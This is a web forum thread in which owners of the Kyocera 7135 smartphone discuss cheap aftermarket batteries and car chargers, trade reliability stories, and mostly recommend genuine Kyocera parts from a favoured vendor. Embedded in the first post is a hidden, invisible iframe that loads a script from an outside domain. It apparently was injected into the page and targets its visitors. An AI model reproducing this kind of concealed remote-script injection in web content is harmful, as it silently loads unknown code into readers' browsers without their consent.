+ Reply to Thread
Page 1 of 2 1 2 LastLast

After Market Batteries

Has anyone tried an aftermarket battery? I see many on ebay for $10-15 with 1200-1400mAh. If you have tried them, can you comment on the performance with repsect to the OEM one from Kyocera?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I purchased a 1400 mAh last Saturday on EBAY and I am still awaiting it's arrival. I will give a full report when I get it.

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Though many people strongly recommend against it, and it can void your warranty if it causes damage to your 7135, I went and tried one that I got on eBay for $8 (before S&H), and it's worked fine for a month. I got a non-OEM car charger for a penny too, and it's worked fine for a month.
    Ahhhh, gadgets! :bigthumb:

I'm going to post my experience with the battery here.... http://www.smartphonesource.com/vbul...&threadid=7514

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Originally posted by SpikeyMikey
    I got a non-OEM car charger for a penny too, and it's worked fine for a month.
    I'd watch out for the non-OEM chargers. I had a Nextel i90 (the cousin of the phone that beat the 7135 in that march madness thing, although I think that was a mistake), and I bought a cheap aftermarket charger. After about two months or so, my phone could no longer charge, even with another charger (suggesting the phone itself had a problem). I took it to a store, told them nothing about a car charger, and after not very long the guy identified that the heads on the phone were damaged from shaking, often caused by an aftermarket car charger juggling around through the natural bumpiness of driving causing a slow erosion of the heads. I had to go three months with only stand-alone battery charging. I know with two batteries you probably charge them stand alone anyway, but for travel and other purposes, you don't want to break the charging heads on your phone. Just a heads up.

Originally posted by mghaffar
    but for travel and other purposes, you don't want to break the charging heads on your phone. Just a heads up.
    "Charging heads"? Could you expand a bit on that? My TM510 car charger plugged into the phone through the serial port (as did the desktop charger). Is this what you are refering to as "charging heads"? The 7135 has a separate, round jack for the travel/car charger. I can't imagine any damage to the round jack from car jiggling?
    -Quick

Administrator
    imo dont get 'em... pay the extra 10-15 bucks (or less) and get the OEM batteries/chargers...

Dan is the man with the real OEM accessories. Check the classifieds section of this board. You can get free USPS shipping.

Extended Life Battery

When I am on the road for work, which often, my battery does not last a full day. I have seen some "extended life" batteries like this one ( http://cgi.ebay.com/ws/eBayISAPI.dll...category=20351 ), on ebay. Has anyone had any experience with thse batteries. Any opinions?

back

battery

Looks like a third party with same rating as the original. YMMV!

My answer is - no. If it isn't Kyocera OEM, and I'm sure it isn't, then don't do it. From what I hear you take a good chance of damaging your 7135. Check out Dan's in the Smartphonesource Classifieds and get an OEM backup battery or a car charger or Car kit if you're driving. Dan's prices are much lower than anywhere else and his service is great.

back
    From what I have seen on Ebay today, Dan is the highest priced for an OEM (genuine Kyocera) battery.

Originally posted by ekaxel
    From what I have seen on Ebay today, Dan is the highest priced for an OEM (genuine Kyocera) battery.
    Be careful how you compare. For example the one that is selling them for $25 charges $10 shipping and handling. I believe that Dan charges $0 shipping and handling for SmartphoneSource buyers. Call him.

-Quick

DAN, DAN, DAN

Dan may be the highest priced OEM supplier in the universe, but he is honest, gives a fair price if you e-mail him for quotes on multiple items and he charges a fair price for shipping and handling.

What is the use of saving a few bucks if you have to worry about if brand X is going to trash your phone in a month or two.

I am not saying pay the highest price for everything, but when a vendor gets dozens, if not hundreds of positive testimonials on this forum and Kyocera, Verizon and many senior forum members recommend not using off brand batteries, I am at a loss why this topic keeps coming up.

You pays your money and you takes your chances. My money is on a proven vendor with proven products.

Respectfully;
    bcottun

I'd like to add that I bought a non-oem battery with my last 7135 and it worked fine at first for about the first month. However I started to notice although it's rating indication it was longer lasting, it really was only about half as powerful as the OEM one. I'd recommend spending the extra cash, you get what you pay for...

back
    I have used aftermarket electronics for years, and IMHO, the only thing the big guys are interested in with their recommendations and dire predictions are their obscene profits on their branded stuff they buy from the same factories and suppliers as the third party products.

No explosion!? No fire!? No brimstone!? I'd use aftermarket stuff if I was 100% convinced it was safe AND saved me enough money to justify it. But there are horror stories out there also, no?

Growing old is mandatory; growing up is optional.

Smoothop

Originally posted by Smoothop
    No explosion!? No fire!? No brimstone!? I'd use aftermarket stuff if I was 100% convinced it was safe AND saved me enough money to justify it. But there are horror stories out there also, no?

I haven't heard of anything that drastic (although it's probably happened somewhere). The reason I use the Kyocera branded batteries is because they actually have the capacity they are labled as having. Kyocera has to back that up when they put their name on it.

There won't be anyone there to back up the claims on generic batteries. We have already seen batteries for the 7135 that are advertised as having *more* capacity but are actually labled as having *less* capacity.

Next thing you know there will be batteries that are *labled* as having *more* capacity but don't last as long for some reason. I've seen too many people dump a lot of money down the drain with cheap s*** (thinking they were saving money). I buy the good stuff and for some silly reason I seem to buy less of it. Funny how that works.
    -Data Rox

Well put Data Rox.. Thanks...it is always nice to hear the defense of a product line against the generics.

Dan's pricing makes it palatable to buy OEM. Otherwise ther'd be a greater need to know how well certain types of aftermarket accessories stacked up. Luckily there is Dan.

The sour taste of poor quality lasts a lot longer than sweet taste of a low price.

Smoothop

Purged, Merged, and Converged

After-market battery

As I quickly learned, the 7135's battery life leaves something to be desired. I'd really rather not pay Kyocera's price for a spare but am wary of after-market batteries (short life and poor construction being the typical problems).

Does anyone have any experience with such batteries for the 7135 that they would like to share?